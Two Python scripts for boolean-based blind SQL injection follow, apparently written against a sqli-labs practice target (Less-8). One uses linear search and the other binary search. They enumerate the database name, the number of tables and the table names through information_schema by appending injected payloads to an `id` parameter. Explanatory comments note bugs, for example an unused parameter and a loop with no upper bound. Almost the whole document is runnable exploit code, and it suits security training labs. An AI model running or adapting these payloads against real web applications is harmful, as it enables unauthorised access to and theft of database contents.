一、SQL盲注脚本(普通版):
import requests
# Base URL every probe below is sent to. The hostname and the "Less-8" path
# look like a hosted sqli-labs practice instance; the injected condition is
# appended to this URL as the `id` query parameter.
url = "http://9fe5aba4-b55b-49d8-af3e-795e070d0b23.node5.buuoj.cn/Less-8/"
# Query-string template for probing the length of the current database name.
# `{n}` is the candidate length. The script treats the presence of the marker
# 'You are in...........' in the response as "condition true", which is the
# boolean oracle the whole blind-injection script is built on.
payload_len = "?id=1' and length(database()) = {n} --+"
def getLength(url: str, payload) -> int:
    """Probe the length of the current database name one value at a time.

    Args:
        url: Base URL the query string is appended to.
        payload: Unused. The body reads the module-level ``payload_len``
            template instead of this argument.

    Returns:
        The first candidate length for which the response body contains the
        marker ``'You are in...........'``.

    Note:
        The loop has no upper bound: if the marker never appears (target
        unreachable, input handled safely, different page text) the function
        never returns. Every iteration is one HTTP GET.
    """
    length = 1
    while True:
        # NOTE: the `payload` parameter is ignored; the global template is used.
        response = requests.get(url = url + payload_len.format(n = length))
        # Marker present => the injected `length(database()) = n` held.
        if 'You are in...........' in response.text:
            print('数据库名称长度为:', length)
            return length
        else:
            print('正在测试长度:', length)
            length += 1
# Query-string template for recovering the database name: `{n}` is the
# 1-based character position passed to substr(), `{r}` the candidate ASCII code.
payload_str = "?id=1' and ascii(substr(database(), {n}, 1)) = {r} --+"
def getStr(url: str, payload, length: int) -> str:
    """Recover the database name character by character.

    For each position 1..``length`` the ASCII codes 33..125 are tried in
    turn (one GET each) until the response carries the success marker; the
    matching character is appended to the result.

    Args:
        url: Base URL the query string is appended to.
        payload: Unused. The body reads the module-level ``payload_str``
            template instead of this argument.
        length: Number of characters to recover (the commented-out call
            site below feeds it the result of ``getLength``).

    Returns:
        The recovered characters in order. A position for which no candidate
        matched contributes nothing, so the result can be shorter than
        ``length``.
    """
    str = '' # accumulated table/database name, starts empty (shadows the builtin `str`)
    # Outer loop: one character position at a time
    for i in range(1, length + 1):
        # Inner loop: linear search over the candidate ASCII codes
        for j in range(33, 126):
            response = requests.get(url = url + payload_str.format(n = i, r = j))
            # Marker present => `ascii(substr(...)) = j` held for this position
            if 'You are in...........' in response.text:
                str += chr(j)
                print('第', i, '个字符猜解成功:', str)
                break
    return str
# Database-name recovery, left commented out by the author:
#length = getLength(url, payload_len)
#database_name = getStr(url, payload_str, length)

# --- Number of tables in the `security` schema ---
# Linear probe of the counts 1..99; `table_count` stays 0 if none matched.
# Each probe is a GET whose query string carries the full information_schema
# sub-select, so the enumeration is a long run of near-identical requests
# that differ only in a counter -- easy to spot in request logs.
table_count = 0
for i in range(1, 100):
    payload_table_count = "?id=1' and (select count(table_name) from information_schema.tables where table_schema='security') = {n} --+"
    response = requests.get(url = url + payload_table_count.format(n = i))
    if 'You are in...........' in response.text:
        table_count = i
        break
    else:
        print('正在测试长度:', i)
print('数据库下表的数量为:', table_count)

# --- For each table (0-based `limit {m},1` offset): its name length, then its name ---
table_length = 0
for i in range(0, table_count):
    # Length of the i-th table name, linear probe of 1..99.
    for j in range(1, 100):
        payload_table_length = "?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit {m},1))={n}--+"
        response = requests.get(url = url + payload_table_length.format(m=i, n=j))
        if 'You are in...........' in response.text:
            table_length = j
            break
        else:
            # Only feeds the progress message; it is overwritten by `j` on a
            # match and is not reset between tables.
            table_length += 1
            print("正在测试第", i + 1, "张表的长度,长度为:", table_length)
    print("第", i + 1, "张表的长度为:", table_length)
    # Name of the i-th table: for every 1-based position `k`, linear search
    # over the ASCII codes 65..126. `{p}` = table offset, `{q}` = position,
    # `{r}` = candidate code.
    table_name = ""
    for k in range(1, table_length + 1):
        for z in range(65, 127):
            payload_table_name = "?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'security' limit {p}, 1),{q},1)) = {r} --+"
            response = requests.get(url = url + payload_table_name.format(p=i, q=k, r=z))
            if 'You are in...........' in response.text:
                table_name += chr(z)
                print("第", i + 1, "张表的表名为:", table_name)
                break
    print("第", i + 1, "张表的表名为:", table_name)
二、SQL盲注脚本(二分法):
import requests
# Base URL every probe below is sent to (same practice instance as the
# first script; the hostname and "Less-8" path look like hosted sqli-labs).
url = "http://9fe5aba4-b55b-49d8-af3e-795e070d0b23.node5.buuoj.cn/Less-8/"
# Template for probing the length of the current database name; `{n}` is the
# candidate length. The marker 'You are in...........' in the response is
# used throughout as the boolean oracle for "condition true".
payload_len = "?id=1' and length(database()) = {n} --+"
def getLength(url: str, payload) -> int:
    """Probe the length of the current database name one value at a time.

    Identical to the function of the same name in the first script.

    Args:
        url: Base URL the query string is appended to.
        payload: Unused. The body reads the module-level ``payload_len``
            template instead of this argument.

    Returns:
        The first candidate length for which the response body contains the
        marker ``'You are in...........'``.

    Note:
        There is no upper bound on the loop; if the marker never appears the
        function never returns. One HTTP GET per iteration.
    """
    length = 1
    while True:
        # NOTE: the `payload` parameter is ignored; the global template is used.
        response = requests.get(url = url + payload_len.format(n = length))
        if 'You are in...........' in response.text:
            print('数据库名称长度为:', length)
            return length
        else:
            print('正在测试长度:', length)
            length += 1
# Template for recovering the database name: `{n}` is the 1-based character
# position passed to substr(), `{r}` the candidate ASCII code.
payload_str = "?id=1' and ascii(substr(database(), {n}, 1)) = {r} --+"
def getStr(url: str, payload, length: int) -> str:
    """Recover the database name character by character (linear search).

    Note that this helper still uses the linear scan of ASCII 33..125; only
    the table-name loop further down uses the binary search this script is
    named for.

    Args:
        url: Base URL the query string is appended to.
        payload: Unused. The body reads the module-level ``payload_str``
            template instead of this argument.
        length: Number of characters to recover.

    Returns:
        The recovered characters in order; a position with no matching
        candidate contributes nothing.
    """
    str = '' # accumulated table/database name, starts empty (shadows the builtin `str`)
    # Outer loop: one character position at a time
    for i in range(1, length + 1):
        # Inner loop: linear search over the candidate ASCII codes
        for j in range(33, 126):
            response = requests.get(url = url + payload_str.format(n = i, r = j))
            # Marker present => `ascii(substr(...)) = j` held for this position
            if 'You are in...........' in response.text:
                str += chr(j)
                print('第', i, '个字符猜解成功:', str)
                break
    return str
# Database-name recovery, left commented out by the author:
#length = getLength(url, payload_len)
#database_name = getStr(url, payload_str, length)

# --- Number of tables in the `security` schema ---
# Linear probe of the counts 1..99; `table_count` stays 0 if none matched.
# Every probe is a GET carrying the information_schema sub-select, so the
# run shows up in request logs as many near-identical requests differing
# only in a counter.
table_count = 0
for i in range(1, 100):
    payload_table_count = "?id=1' and (select count(table_name) from information_schema.tables where table_schema='security') = {n} --+"
    response = requests.get(url = url + payload_table_count.format(n = i))
    if 'You are in...........' in response.text:
        table_count = i
        break
    else:
        print('正在测试长度:', i)
print('数据库下表的数量为:', table_count)

# --- For each table (0-based `limit {m},1` offset): its name length, then its name ---
table_length = 0
for i in range(0, table_count):
    # Length of the i-th table name, linear probe of 1..99.
    for j in range(1, 100):
        payload_table_length = "?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit {m},1))={n}--+"
        response = requests.get(url = url + payload_table_length.format(m=i, n=j))
        if 'You are in...........' in response.text:
            table_length = j
            break
        else:
            print("正在测试第", i + 1, "张表的长度,长度为:", j)
    print("第", i + 1, "张表的长度为:", table_length)
    # Name of the i-th table, one position at a time, each character found by
    # binary search on the `ascii(...) < {r}` oracle instead of a linear scan.
    table_name = ""
    for k in range(1, table_length + 1):
        min = 33   # lower bound of the search window (shadows builtin `min`)
        max = 126  # upper bound of the search window (shadows builtin `max`)
        mid = (min + max) // 2
        # Assuming the character's code lies within 33..125, the loop keeps
        # min <= ascii(c) + 1 <= max: a "true" answer to `ascii(c) < mid`
        # lowers max to mid, a "false" answer raises min to mid + 1.
        while min < max:
            payload_table_name = "?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'security' limit {p}, 1),{q},1)) < {r} --+"
            response = requests.get(url = url + payload_table_name.format(p=i, q=k, r=mid))
            if 'You are in...........' in response.text:
                max = mid
            else:
                min = mid + 1
            mid = (min + max) // 2
            # NOTE(review): the original indentation was lost; this guard is
            # assumed to sit inside the while loop. It stops the search if the
            # window drifts outside the printable range.
            if mid <= 32 or mid >= 127:
                break
        # When the loop ends with min == max, `mid` is the smallest value the
        # character's code is strictly less than, i.e. ascii(c) + 1 -- hence
        # the `- 1` here.
        table_name += chr(mid - 1)
        print("正在注出表名:", table_name)
    print("第", i + 1, "张表的表名为:", table_name)